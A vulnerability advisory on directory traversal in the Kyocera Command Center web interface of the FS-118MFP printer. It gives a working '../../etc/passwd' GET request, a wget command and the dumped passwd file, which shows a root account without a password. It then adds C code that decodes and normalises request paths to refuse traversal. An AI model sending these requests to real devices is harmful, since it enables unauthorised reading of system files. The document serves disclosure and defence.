Kyocera Command Center Directory Traversal Vulnerability

Version: I've tested this vulnerability on the Kyocera Command Center embedded in the FS-118MFP printer (an embedded Linux system), but I suppose that other Kyocera printers may be vulnerable.

Vulnerability: Directory Traversal

Risk: Critical

Description (Wikipedia, http://en.wikipedia.org/wiki/Directory_traversal):

"A directory traversal (or path traversal) is to exploit insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs. The goal of this attack is to order an application to access a computer file that is not intended to be accessible. This attack exploits a lack of security (the software is acting exactly as it is supposed to) as opposed to exploiting a bug in the code. Directory traversal is also known as the ../ (dot dot slash) attack, directory climbing, and backtracking. Some forms of this attack are also canonicalization attacks."

Example GET Request:

    GET /../../../../../../../../../etc/passwd HTTP/1.0

Example file download:

    wget http://yourip/../../../../../../../../../etc/passwd
    cat passwd
    root::0:0:root:/root:/bin/sh
    bin:*:1:1:bin:/bin:
    daemon:*:2:2:daemon:/usr/sbin:
    sys:*:3:3:sys:/dev:
    adm:*:4:4:adm:/var/adm:
    lp:*:5:7:lp:/var/spool/lpd:
    sync:*:6:8:sync:/bin:/bin/sync
    shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown
    halt:*:8:10:halt:/sbin:/sbin/halt
    mail:*:9:11:mail:/var/spool/mail:
    news:*:10:12:news:/var/spool/news:
    uucp:*:11:13:uucp:/var/spool/uucp:
    operator:*:12:0:operator:/root:
    games:*:13:100:games:/usr/games:
    ftp:*:15:14:ftp:/var/ftp:
    man:*:16:100:man:/var/cache/man:
    nobody:*:65534:65534:nobody:/home:/bin/sh

Francesco Tornieri
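The check a file-serving handler needs in order to stop the request shown above, as an added example in C that is not Kyocera's code nor the Command Center's implementation: the raw request path is percent-decoded once, lexically normalised so that "." and "//" are dropped and each ".." pops one segment, and any ".." that would climb above the document root causes the request to be refused instead of being handed to the file API. The document root "/var/www", the buffer sizes and the sample paths other than the advisory's own are assumptions made for the demonstration.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not Kyocera's code: confine an HTTP request path to a
 * document root by decoding it, collapsing "." and "..", and refusing any
 * path that tries to climb above the root. */

#define MAX_SEGS 64
#define ADVISORY_PATH "/../../../../../../../../../etc/passwd"   /* path from the advisory */

static int hexval(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode %XX escapes exactly once. Rejects malformed escapes and %00.
 * Returns 0 on success, -1 if the request must be refused. */
int url_decode(const char *in, char *out, size_t outlen) {
    size_t o = 0;
    for (const char *p = in; *p; p++) {
        int c = (unsigned char)*p;
        if (c == '%') {
            int h = hexval((unsigned char)p[1]);
            int l = (h < 0) ? -1 : hexval((unsigned char)p[2]);
            if (h < 0 || l < 0) return -1;            /* "%zz" or truncated escape */
            c = (h << 4) | l;
            p += 2;
        }
        if (c == 0 || o + 1 >= outlen) return -1;     /* NUL would truncate the path */
        out[o++] = (char)c;
    }
    out[o] = '\0';
    return 0;
}

/* Lexically normalise a decoded path: drop "." and empty segments, pop one
 * segment per "..". Writes "/a/b" (or "/") to out. Returns how many ".."
 * tried to go above the root (0 = stayed inside), or -1 on buffer overflow. */
int normalise_path(const char *path, char *out, size_t outlen) {
    const char *seg[MAX_SEGS];
    size_t len[MAX_SEGS];
    int n = 0, climbs = 0;
    const char *p = path;

    while (*p) {
        while (*p == '/') p++;                        /* collapse "//" */
        if (!*p) break;
        const char *start = p;
        while (*p && *p != '/') p++;
        size_t l = (size_t)(p - start);
        if (l == 1 && start[0] == '.') continue;
        if (l == 2 && start[0] == '.' && start[1] == '.') {
            if (n > 0) n--; else climbs++;            /* ".." at the root is the attack */
            continue;
        }
        if (n >= MAX_SEGS) return -1;
        seg[n] = start; len[n] = l; n++;
    }

    if (n == 0) {
        if (outlen < 2) return -1;
        strcpy(out, "/");
        return climbs;
    }
    size_t pos = 0;
    for (int i = 0; i < n; i++) {
        if (pos + 1 + len[i] + 1 > outlen) return -1;  /* '/', segment, NUL */
        out[pos++] = '/';
        memcpy(out + pos, seg[i], len[i]);
        pos += len[i];
    }
    out[pos] = '\0';
    return climbs;
}

/* Map a raw request path onto docroot. Returns 0 and fills out on success,
 * -1 if the request must be refused (traversal, bad escape, overflow). */
int resolve_under_docroot(const char *docroot, const char *raw, char *out, size_t outlen) {
    char decoded[512], norm[512];
    if (url_decode(raw, decoded, sizeof decoded) != 0) return -1;
    int climbs = normalise_path(decoded, norm, sizeof norm);
    if (climbs != 0) return -1;                        /* >0 traversal, -1 overflow */
    if (snprintf(out, outlen, "%s%s", docroot, norm) >= (int)outlen) return -1;
    return 0;
}

/* Self-check helper: 1 if raw resolves exactly to expected, else 0. */
int resolves_to(const char *docroot, const char *raw, const char *expected) {
    char buf[1024];
    if (resolve_under_docroot(docroot, raw, buf, sizeof buf) != 0) return 0;
    return strcmp(buf, expected) == 0;
}

int main(void) {
    const char *samples[] = { ADVISORY_PATH, "/images//./logo.png", "/%2e%2e/etc/passwd" };
    char buf[1024];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int rc = resolve_under_docroot("/var/www", samples[i], buf, sizeof buf);
        printf("%-40s -> %s\n", samples[i], rc == 0 ? buf : "REFUSED (403)");
    }
    return 0;
}
```

Decoding runs before normalisation so that an encoded "%2e%2e" cannot slip past the check, and the decoder rejects "%00" because a NUL would silently truncate the path at the C file API. Lexical normalisation only confines the string; symbolic links inside the document root are a separate concern, handled by comparing the opened file's real path (realpath()) against the root.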